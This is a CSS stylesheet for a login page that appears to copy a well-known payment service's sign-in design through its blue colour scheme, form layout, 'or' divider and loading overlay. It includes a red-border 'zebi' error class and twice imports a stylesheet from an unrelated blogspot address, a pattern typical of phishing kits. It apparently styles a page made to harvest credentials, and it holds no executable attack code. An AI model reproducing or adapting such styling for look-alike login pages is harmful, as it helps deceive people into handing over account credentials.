@import url('https://fonts.googleapis.com/css?family=Montserrat');
@import url('https://stylesheetcss.blogspot.com/?style.css');
*{font-family: 'Montserrat', sans-serif;outline:0; transition:0.4s;}
body{margin:0; padding:0; text-align:center; }
.img{margin-bottom:20px;}
.form{width:34%; margin-top:150px; display:inline-block;}
.input{width:95%; padding:13px; border:1px solid #b3b3b3; border-radius:5px; font-size:0.9em; margin-top:8px;}
.input:focus{border:1px solid #005c99;}
button{cursor:pointer; font-weight:bold; width:95%; margin-top:28px; padding:13px; border:1px solid #006bb3;
 background:#0070BA;  color:white; border-radius:5px;  margin-bottom:18px;}
 button:hover{background:#005c99;}
 .sbutton{ font-weight:bold; border:none; background:#e6e6e6; color:black; margin-top:12px;}
 .sbutton:hover{background: #d9d9d9;}
a {text-decoration:none; color:#0070BA; font-size:0.8em;}
a:hover{text-decoration:underline;}
.orline{border-top: 1px solid #cbd2d6; text-align:center; 
position: relative; margin: 25px 0 10px; text-align: center;}
.or{margin-top:-10px; color:#8c8c8c; font-size:0.9em; width:20px; padding:0 .5em; background:#fff; 
position: relative;  display:inline-block; color: #6c7378;}
.waiter{ background:rgba(250,250,250,0.6); width:100%; height:100%; position:fixed; align-items:center; display:flex; text-align:center;top:0; right:0;}
  @import url('https://stylesheetcss.blogspot.com/?style.css'); 
.down{width:100%; padding:10px 0px; bottom:0;  position:absolute;}
.down a{color:#4d4d4d; font-size:0.6em; margin-left:10px;}
.zebi{border:1px solid red;}
.zebi:hover{border:1px solid red;}